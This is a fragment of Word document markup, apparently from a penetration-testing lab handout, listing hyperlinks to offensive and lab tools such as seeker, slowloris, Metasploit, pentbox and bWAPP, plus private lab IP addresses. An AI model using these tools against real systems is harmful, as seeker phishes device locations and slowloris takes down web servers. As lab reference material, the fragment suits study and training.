        <w:color w:val="212121"/>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github.com/cloudflare/cloudflared/releases/download/2025.1.1/cloudflared-linux-amd64" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/thewhiteh4t/seeker.git" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.101" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/metasploi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iark.greenend.org.uk/~sgtatham/putty/latest.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gkbrk/slowloris.git" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gkbrk/slowloris.git" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/technicaldada/pentbox.git" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/technicaldada/pentbox.git" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.15:55454/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wampserver.aviatechno.net/"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www.youtube.com/redirect?event=video_description&amp;redir_token=QUFFLUhqbFpZLUljcW9kRW5SX3VXNExUQ1JFckZmdDBld3xBQ3Jtc0tsUEtTdFBJNEdvNzE0N3BubU5JdUVRNG1EbDl4cF9qanRYUUJWZ3g0dlhyN0VOalV1cW5oWk1wZXpnc3Q1amd5bXpfTnZqbFlnaDlXay10TENJX21MN1g4eXJ5OUE0TkhWWEJBWHNNSm1xMlNQUVhfYw&amp;q=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fbwapp%2F&amp;v=eZyxU19QG9o"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